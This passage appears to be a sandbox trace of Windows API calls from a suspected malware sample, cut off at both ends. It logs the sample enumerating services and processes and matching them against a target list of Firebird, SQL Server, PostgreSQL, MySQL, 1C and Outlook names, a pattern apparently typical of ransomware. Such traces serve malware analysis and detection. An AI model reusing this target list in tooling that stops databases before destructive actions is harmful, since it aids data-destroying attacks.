szExeFile="mode.com")) returned 0 [0267.661] CloseHandle (hObject=0x138) returned 1 [0267.661] Sleep (dwMilliseconds=0x1f4) [0268.559] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x65b800 [0268.812] EnumServicesStatusExW (in: hSCManager=0x65b800, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 0 [0268.818] GetLastError () returned 0xea [0268.818] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa08) returned 0x65d980 [0268.818] EnumServicesStatusExW (in: hSCManager=0x65b800, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x65d980, cbBufSize=0xa08, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x65d980, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 1 [0268.822] CloseServiceHandle (hSCObject=0x65b800) returned 1 [0268.826] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0268.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0268.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0268.826] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0268.826] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0268.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0268.826] lstrlenW (lpString="AudioSrv") returned 8 [0268.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0268.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0268.826] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0268.826] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0268.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0268.826] lstrlenW (lpString="BFE") returned 3 [0268.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0268.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0268.826] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0268.826] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0268.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0268.826] lstrlenW (lpString="CscService") returned 10 [0268.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0268.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0268.826] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0268.826] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0268.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0268.826] lstrlenW (lpString="DcomLaunch") returned 10 [0268.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0268.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0268.826] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0268.826] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0268.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0268.826] lstrlenW (lpString="Dhcp") returned 4 [0268.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0268.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0268.827] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0268.827] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0268.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0268.827] lstrlenW (lpString="Dnscache") returned 8 [0268.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0268.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0268.827] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0268.827] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0268.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0268.827] lstrlenW (lpString="eventlog") returned 8 [0268.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0268.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0268.827] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0268.827] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0268.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0268.827] lstrlenW (lpString="EventSystem") returned 11 [0268.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0268.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0268.827] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0268.827] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0268.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0268.827] lstrlenW (lpString="gpsvc") returned 5 [0268.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0268.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0268.827] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0268.827] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0268.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0268.827] lstrlenW (lpString="lmhosts") returned 7 [0268.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0268.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0268.827] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0268.827] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0268.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0268.828] lstrlenW (lpString="MMCSS") returned 5 [0268.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0268.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0268.828] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0268.828] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0268.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0268.828] lstrlenW (lpString="nsi") returned 3 [0268.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0268.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0268.828] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0268.828] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0268.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0268.828] lstrlenW (lpString="PlugPlay") returned 8 [0268.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0268.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0268.828] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0268.828] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0268.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0268.828] lstrlenW (lpString="Power") returned 5 [0268.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0268.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0268.828] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0268.828] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0268.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0268.828] lstrlenW (lpString="ProfSvc") returned 7 [0268.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0268.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0268.828] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0268.828] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0268.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0268.828] lstrlenW (lpString="RpcEptMapper") returned 12 [0268.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0268.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0268.829] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0268.829] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0268.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0268.829] lstrlenW (lpString="RpcSs") returned 5 [0268.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0268.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0268.829] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0268.829] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0268.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0268.829] lstrlenW (lpString="SamSs") returned 5 [0268.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0268.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0268.829] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0268.829] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0268.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0268.829] lstrlenW (lpString="Schedule") returned 8 [0268.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0268.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0268.829] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0268.829] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0268.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0268.829] lstrlenW (lpString="SENS") returned 4 [0268.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0268.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0268.829] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0268.829] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0268.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0268.829] lstrlenW (lpString="ShellHWDetection") returned 16 [0268.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0268.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0268.829] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0268.829] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0268.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0268.829] lstrlenW (lpString="Spooler") returned 7 [0268.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0268.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0268.830] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0268.830] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0268.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0268.830] lstrlenW (lpString="Themes") returned 6 [0268.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0268.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0268.830] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0268.830] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0268.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0268.830] lstrlenW (lpString="UxSms") returned 5 [0268.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0268.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0268.830] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0268.830] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0268.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0268.830] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65d980 | out: hHeap=0x5e0000) returned 1 [0268.830] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b0 [0268.831] Process32FirstW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.831] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0268.832] lstrlenW (lpString="System") returned 6 [0268.832] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0268.832] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0268.832] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0268.832] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0268.832] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0268.832] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0268.832] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0268.832] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0268.832] lstrlenW (lpString="smss.exe") returned 8 [0268.832] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0268.832] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0268.832] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0268.832] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0268.832] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0268.832] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0268.832] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0268.832] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0268.833] lstrlenW (lpString="csrss.exe") returned 9 [0268.833] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0268.833] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0268.833] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0268.833] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0268.833] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0268.833] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0268.833] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0268.833] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0268.833] lstrlenW (lpString="wininit.exe") returned 11 [0268.833] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0268.833] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0268.833] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0268.833] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0268.833] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0268.833] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0268.833] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0268.833] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0268.834] lstrlenW (lpString="csrss.exe") returned 9 [0268.834] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0268.834] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0268.834] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0268.834] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0268.834] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0268.834] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0268.834] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0268.834] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0268.834] lstrlenW (lpString="winlogon.exe") returned 12 [0268.834] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0268.834] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0268.834] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0268.834] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0268.834] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0268.834] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0268.834] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0268.834] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0268.835] lstrlenW (lpString="services.exe") returned 12 [0268.835] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0268.835] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0268.835] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0268.835] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0268.835] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0268.835] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0268.835] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0268.835] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0268.835] lstrlenW (lpString="lsass.exe") returned 9 [0268.835] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0268.835] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0268.835] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0268.835] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0268.835] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0268.835] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0268.835] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0268.835] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0268.836] lstrlenW (lpString="lsm.exe") returned 7 [0268.836] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0268.836] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0268.836] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0268.836] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0268.836] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0268.836] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0268.836] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0268.836] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.836] lstrlenW (lpString="svchost.exe") returned 11 [0268.836] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.836] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.836] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.836] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.836] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.836] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.836] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.836] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.837] lstrlenW (lpString="svchost.exe") returned 11 [0268.837] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.837] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.837] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.837] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.837] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.837] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.837] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.837] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.837] lstrlenW (lpString="svchost.exe") returned 11 [0268.837] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.837] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.837] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.837] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.837] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.837] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.837] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.837] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.838] lstrlenW (lpString="svchost.exe") returned 11 [0268.838] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.838] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.838] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.838] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.838] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.838] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.838] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.838] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.838] lstrlenW (lpString="svchost.exe") returned 11 [0268.838] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.838] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.838] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.838] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.838] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.838] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.838] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.838] Process32NextW (in: hSnapshot=0x1b0, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, 